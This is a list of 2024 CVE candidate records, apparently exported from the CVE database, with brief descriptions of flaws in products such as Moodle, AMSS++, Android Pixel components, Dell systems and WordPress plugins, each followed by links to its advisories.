CVE    2024    2604    Candidate    A vulnerability was found in SourceCodester File Manager App 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update-file.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257182 is the identifier assigned to this vulnerability.    MISC:VDB-257182 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257182   |   MISC:VDB-257182 | SourceCodester File Manager App update-file.php unrestricted upload   |   URL:https://vuldb.com/?id.257182   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20File%20Manager%20App/Arbitrary%20File%20Upload%20-%20update-file.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20File%20Manager%20App/Arbitrary%20File%20Upload%20-%20update-file.php.md    Assigned (20240318)
CVE    2024    26032    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable web pages. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser. Exploitation of this issue requires user interaction.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    26018    Candidate    Cross-site scripting vulnerability exists in TvRock 0.9t8a. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable; therefore, users should consider ceasing use of TvRock 0.9t8a.    MISC:https://jvn.jp/en/jp/JVN69107517/   |   URL:https://jvn.jp/en/jp/JVN69107517/    Assigned (20240305)
CVE    2024    26016    Candidate    A low privilege authenticated user could import an existing dashboard or chart that they do not have access to and then modify its metadata, thereby gaining ownership of the object. However, it's important to note that access to the analytical data of these charts and dashboards would still be subject to validation based on data access privileges. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1, which fixes the issue.    MISC:https://lists.apache.org/thread/76v1jjcylgk4p3m0258qr359ook3vl8s   |   URL:https://lists.apache.org/thread/76v1jjcylgk4p3m0258qr359ook3vl8s   |   MLIST:[oss-security] 20240228 CVE-2024-26016: Apache Superset: Improper authorization validation on dashboards and charts import   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/7    Assigned (20240214)
CVE    2024    26005    Candidate    An unauthenticated remote attacker can gain service level privileges through an incomplete cleanup during service restart after a DoS.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    26004    Candidate    An unauthenticated remote attacker can DoS a control agent due to access of an uninitialized pointer which may prevent or disrupt the charging functionality.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    26003    Candidate    An unauthenticated remote attacker can DoS the control agent due to an out-of-bounds read which may prevent or disrupt the charging functionality.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    26002    Candidate    An improper input validation in the Qualcomm plctool allows a local attacker with low privileges to gain root access by changing the ownership of specific files.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    26001    Candidate    An unauthenticated remote attacker can write memory out of bounds due to improper input validation in the MQTT stack. The brute force attack is not always successful because of memory randomization.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    26000    Candidate    An unauthenticated remote attacker can read memory out of bounds due to improper input validation in the MQTT stack. The brute force attack is not always successful because of memory randomization.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25999    Candidate    An unauthenticated local attacker can perform a privilege escalation due to improper input validation in the OCPP agent service.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25998    Candidate    An unauthenticated remote attacker can perform a command injection in the OCPP Service with limited privileges due to improper input validation.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25997    Candidate    An unauthenticated remote attacker can perform a log injection due to improper input validation. Only a certain log file is affected.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25996    Candidate    An unauthenticated remote attacker can perform a remote code execution due to an origin validation error. The access is limited to the service user.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25995    Candidate    An unauthenticated remote attacker can modify configurations to perform a remote code execution due to a missing authentication for a critical function.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25994    Candidate    An unauthenticated remote attacker can upload an arbitrary script file due to improper input validation. The upload destination is fixed and is write only.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240214)
CVE    2024    25993    Candidate    In tmu_reset_tmu_trip_counter of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25992    Candidate    In tmu_tz_control of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25991    Candidate    In acpm_tmu_ipc_handler of tmu_plugin.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25990    Candidate    In pktproc_perftest_gen_rx_packet_sktbuf_mode of link_rx_pktproc.c, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    2599    Candidate    File upload restriction evasion vulnerability in AMSS++ version 4.31. This vulnerability could allow an authenticated user to potentially obtain RCE through webshell, compromising the entire infrastructure.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25989    Candidate    In gpu_slc_liveness_update of pixel_gpu_slc.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25988    Candidate    In SAEMM_DiscloseGuti of SAEMM_RadioMessageCodec.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25987    Candidate    In pt_sysctl_command of pt.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25986    Candidate    In ppmp_unprotect_buf of drm_fw.c, there is a possible compromise of protected memory due to a logic error in the code. This could lead to local escalation of privilege to TEE with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25985    Candidate    In bigo_unlocked_ioctl of bigo.c, there is a possible UAF due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25984    Candidate    In dumpBatteryDefend of dump_power.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240213)
CVE    2024    25983    Candidate    Insufficient checks in a web service made it possible to add comments to the comments block on another user's dashboard when it was not otherwise available (e.g., on their profile page).    FEDORA:FEDORA-2024-d2f180202f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/   |   MISC:RHBZ#2264099   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264099   |   MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-78300   |   URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-78300   |   MISC:https://moodle.org/mod/forum/discuss.php?d=455641   |   URL:https://moodle.org/mod/forum/discuss.php?d=455641    Assigned (20240213)
CVE    2024    25982    Candidate    The link to update all installed language packs did not include the necessary token to prevent a CSRF risk.    FEDORA:FEDORA-2024-d2f180202f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/   |   MISC:RHBZ#2264098   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264098   |   MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-54749   |   URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-54749   |   MISC:https://moodle.org/mod/forum/discuss.php?d=455638   |   URL:https://moodle.org/mod/forum/discuss.php?d=455638    Assigned (20240213)
CVE    2024    25981    Candidate    Separate Groups mode restrictions were not honored when performing a forum export, which would export forum data for all groups. By default this only provided additional access to non-editing teachers.    FEDORA:FEDORA-2024-d2f180202f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/   |   MISC:RHBZ#2264097   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264097   |   MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80504   |   URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80504   |   MISC:https://moodle.org/mod/forum/discuss.php?d=455637   |   URL:https://moodle.org/mod/forum/discuss.php?d=455637    Assigned (20240213)
CVE    2024    25980    Candidate    Separate Groups mode restrictions were not honored in the H5P attempts report, which would display users from other groups. By default this only provided additional access to non-editing teachers.    FEDORA:FEDORA-2024-d2f180202f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/   |   MISC:RHBZ#2264096   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264096   |   MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80501   |   URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80501   |   MISC:https://moodle.org/mod/forum/discuss.php?d=455636   |   URL:https://moodle.org/mod/forum/discuss.php?d=455636    Assigned (20240213)
CVE    2024    2598    Candidate    Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/select_send_2.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25979    Candidate    The URL parameters accepted by forum search were not limited to the allowed parameters.    FEDORA:FEDORA-2024-d2f180202f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/   |   MISC:RHBZ#2264095   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264095   |   MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-69774   |   URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-69774   |   MISC:https://moodle.org/mod/forum/discuss.php?d=455635   |   URL:https://moodle.org/mod/forum/discuss.php?d=455635    Assigned (20240213)
CVE    2024    25978    Candidate    Insufficient file size checks resulted in a denial of service risk in the file picker's unzip functionality.    FEDORA:FEDORA-2024-d2f180202f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/   |   MISC:RHBZ#2264074   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264074   |   MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74641   |   URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74641   |   MISC:https://moodle.org/mod/forum/discuss.php?d=455634   |   URL:https://moodle.org/mod/forum/discuss.php?d=455634    Assigned (20240213)
CVE    2024    25974    Candidate    The Frentix GmbH OpenOlat LMS is affected by a stored Cross-Site Scripting (XSS) vulnerability. It is possible to upload files within the Media Center of OpenOlat version 18.1.5 (or lower) as an authenticated user without any other rights. Although the filetypes are limited, an SVG image containing an XSS payload can be uploaded. After a successful upload the file can be shared with groups of users (including admins) who can be attacked with the JavaScript payload.    FULLDISC:20240220 SEC Consult SA-20240220-0 :: Multiple Stored Cross-Site Scripting Vulnerabilities in OpenOLAT (Frentix GmbH)   |   URL:http://seclists.org/fulldisclosure/2024/Feb/23   |   MISC:https://r.sec-consult.com/openolat   |   URL:https://r.sec-consult.com/openolat    Assigned (20240213)
CVE    2024    25973    Candidate    The Frentix GmbH OpenOlat LMS is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities. An attacker with rights to create or edit groups can create a course with a name that contains an XSS payload. Furthermore, attackers with the permissions to create or rename a catalog (sub-category) can enter unfiltered input in the name field. In addition, attackers who are allowed to create curriculums can also enter unfiltered input in the name field. This allows an attacker to execute stored JavaScript code with the permissions of the victim in the context of the user's browser.    FULLDISC:20240220 SEC Consult SA-20240220-0 :: Multiple Stored Cross-Site Scripting Vulnerabilities in OpenOLAT (Frentix GmbH)   |   URL:http://seclists.org/fulldisclosure/2024/Feb/23   |   MISC:https://r.sec-consult.com/openolat   |   URL:https://r.sec-consult.com/openolat    Assigned (20240213)
CVE    2024    25972    Candidate    Initialization of a resource with an insecure default vulnerability in OET-213H-BTS1 sold in Japan by Atsumi Electric Co., Ltd. allows a network-adjacent unauthenticated attacker to configure and control the affected product.    MISC:https://jvn.jp/en/jp/JVN77203800/   |   URL:https://jvn.jp/en/jp/JVN77203800/   |   MISC:https://www.atsumi.co.jp/info-20240229.html   |   URL:https://www.atsumi.co.jp/info-20240229.html   |   MISC:https://www.atsumi.co.jp/pdf/oet-213h-bts1.pdf   |   URL:https://www.atsumi.co.jp/pdf/oet-213h-bts1.pdf    Assigned (20240213)
CVE    2024    2597    Candidate    Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/bookdetail_school_person.php, in the 'b_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25964    Candidate    Dell PowerScale OneFS 9.5.0.x through 9.7.0.x contain a covert timing channel vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.    MISC:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities    Assigned (20240213)
CVE    2024    2596    Candidate    Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/mail/main/select_send.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25951    Candidate    A command injection vulnerability exists in local RACADM. A malicious authenticated user could gain control of the underlying operating system.    MISC:https://www.dell.com/support/kbdoc/en-us/000222591/dsa-2024-089-security-update-for-dell-idrac8-local-racadm-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222591/dsa-2024-089-security-update-for-dell-idrac8-local-racadm-vulnerability    Assigned (20240213)
CVE    2024    2595    Candidate    Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/bookdetail_khet_person.php, in the 'b_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25942    Candidate    Dell PowerEdge Server BIOS contains an Improper SMM communication buffer verification vulnerability. A physical high privileged attacker could potentially exploit this vulnerability leading to arbitrary writes to SMRAM.    MISC:https://www.dell.com/support/kbdoc/en-us/000223210/dsa-2024-104-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000223210/dsa-2024-104-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability    Assigned (20240213)
CVE    2024    25941    Candidate    The jail(2) system call has not limited the visibility of allocated TTYs (the kern.ttys sysctl). This gives rise to an information leak about processes outside the current jail. An attacker can get information about TTYs allocated on the host or in other jails. Effectively, the information printed by "pstat -t" may be leaked.    MISC:https://security.freebsd.org/advisories/FreeBSD-SA-24:02.tty.asc   |   URL:https://security.freebsd.org/advisories/FreeBSD-SA-24:02.tty.asc    Assigned (20240213)
CVE    2024    25940    Candidate    `bhyveload -h <host-path>` may be used to grant loader access to the <host-path> directory tree on the host. Affected versions of bhyveload(8) do not make any attempt to restrict loader's access to <host-path>, allowing the loader to read any file the host user has access to. In the bhyveload(8) model, the host supplies a userboot.so to boot with, but the loader scripts generally come from the guest image. A maliciously crafted script could be used to exfiltrate sensitive data from the host accessible to the user running bhyveload(8), which is often the system root.    MISC:https://security.freebsd.org/advisories/FreeBSD-SA-24:01.bhyveload.asc   |   URL:https://security.freebsd.org/advisories/FreeBSD-SA-24:01.bhyveload.asc    Assigned (20240213)
CVE    2024    2594    Candidate    Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/admin/index.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25937    Candidate    SQL injection vulnerability exists in the script DIAE_tagHandler.ashx.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    25936    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoundCloud Inc., Lawrie Malen SoundCloud Shortcode allows Stored XSS. This issue affects SoundCloud Shortcode: from n/a through 4.0.1.    MISC:https://patchstack.com/database/vulnerability/soundcloud-shortcode/wordpress-soundcloud-shortcode-plugin-4-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/soundcloud-shortcode/wordpress-soundcloud-shortcode-plugin-4-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25935    Candidate    Missing Authorization vulnerability in Metagauss RegistrationMagic. This issue affects RegistrationMagic: from n/a through 5.2.5.9.    MISC:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-broken-access-control-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25934    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormFacade allows Stored XSS. This issue affects FormFacade: from n/a through 1.0.0.    MISC:https://patchstack.com/database/vulnerability/formfacade/wordpress-formfacade-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/formfacade/wordpress-formfacade-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25933    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Pepro Dev. Group PeproDev Ultimate Invoice. This issue affects PeproDev Ultimate Invoice: from n/a through 1.9.7.    MISC:https://patchstack.com/database/vulnerability/pepro-ultimate-invoice/wordpress-peprodev-ultimate-invoice-plugin-1-9-7-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pepro-ultimate-invoice/wordpress-peprodev-ultimate-invoice-plugin-1-9-7-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25932    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Manish Kumar Agarwal Change Table Prefix. This issue affects Change Table Prefix: from n/a through 2.0.    MISC:https://patchstack.com/database/vulnerability/change-table-prefix/wordpress-change-table-prefix-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/change-table-prefix/wordpress-change-table-prefix-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25931    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Heureka Group Heureka. This issue affects Heureka: from n/a through 1.0.8.    MISC:https://patchstack.com/database/vulnerability/heureka/wordpress-heureka-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/heureka/wordpress-heureka-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25930    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Nuggethon Custom Order Statuses for WooCommerce. This issue affects Custom Order Statuses for WooCommerce: from n/a through 1.5.2.    MISC:https://patchstack.com/database/vulnerability/custom-order-statuses-for-woocommerce/wordpress-custom-order-statuses-for-woocommerce-plugin-1-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/custom-order-statuses-for-woocommerce/wordpress-custom-order-statuses-for-woocommerce-plugin-1-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    2593    Candidate    Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/bookdetail_group.php, in the 'b_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25928    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sitepact. This issue affects Sitepact: from n/a through 1.0.5.    MISC:https://patchstack.com/database/vulnerability/sitepact-klaviyo-contact-form-7/wordpress-sitepact-s-contact-form-7-extension-for-klaviyo-plugin-1-0-5-reflected-xss-via-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/sitepact-klaviyo-contact-form-7/wordpress-sitepact-s-contact-form-7-extension-for-klaviyo-plugin-1-0-5-reflected-xss-via-sql-injection-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25927    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Joel Starnes postMash – custom post order. This issue affects postMash – custom post order: from n/a through 1.2.0.    MISC:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-sql-injection-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25925    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in SYSBASICS WooCommerce Easy Checkout Field Editor, Fees & Discounts. This issue affects WooCommerce Easy Checkout Field Editor, Fees & Discounts: from n/a through 3.5.12.    MISC:https://patchstack.com/database/vulnerability/phppoet-checkout-fields/wordpress-woocommerce-easy-checkout-field-editor-fees-discounts-plugin-3-5-12-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/phppoet-checkout-fields/wordpress-woocommerce-easy-checkout-field-editor-fees-discounts-plugin-3-5-12-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25922    Candidate    Missing Authorization vulnerability in Peach Payments Peach Payments Gateway. This issue affects Peach Payments Gateway: from n/a through 3.1.9.    MISC:https://patchstack.com/database/vulnerability/wc-peach-payments-gateway/wordpress-peach-payments-gateway-plugin-3-1-9-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wc-peach-payments-gateway/wordpress-peach-payments-gateway-plugin-3-1-9-broken-access-control-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25921    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Concerted Action Action Network allows Reflected XSS. This issue affects Action Network: from n/a through 1.4.2.    MISC:https://patchstack.com/database/vulnerability/wp-action-network/wordpress-action-network-plugin-1-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-action-network/wordpress-action-network-plugin-1-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    2592    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/person/pic_show.php, in the 'person_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25919    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS. This issue affects Custom Field Template: from n/a through 2.6.    MISC:https://patchstack.com/database/vulnerability/custom-field-template/wordpress-custom-field-template-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/custom-field-template/wordpress-custom-field-template-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25916    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joseph C Dolson My Calendar allows Stored XSS. This issue affects My Calendar: from n/a through 3.4.23.    MISC:https://patchstack.com/database/vulnerability/my-calendar/wordpress-my-calendar-plugin-3-4-23-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/my-calendar/wordpress-my-calendar-plugin-3-4-23-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240212)
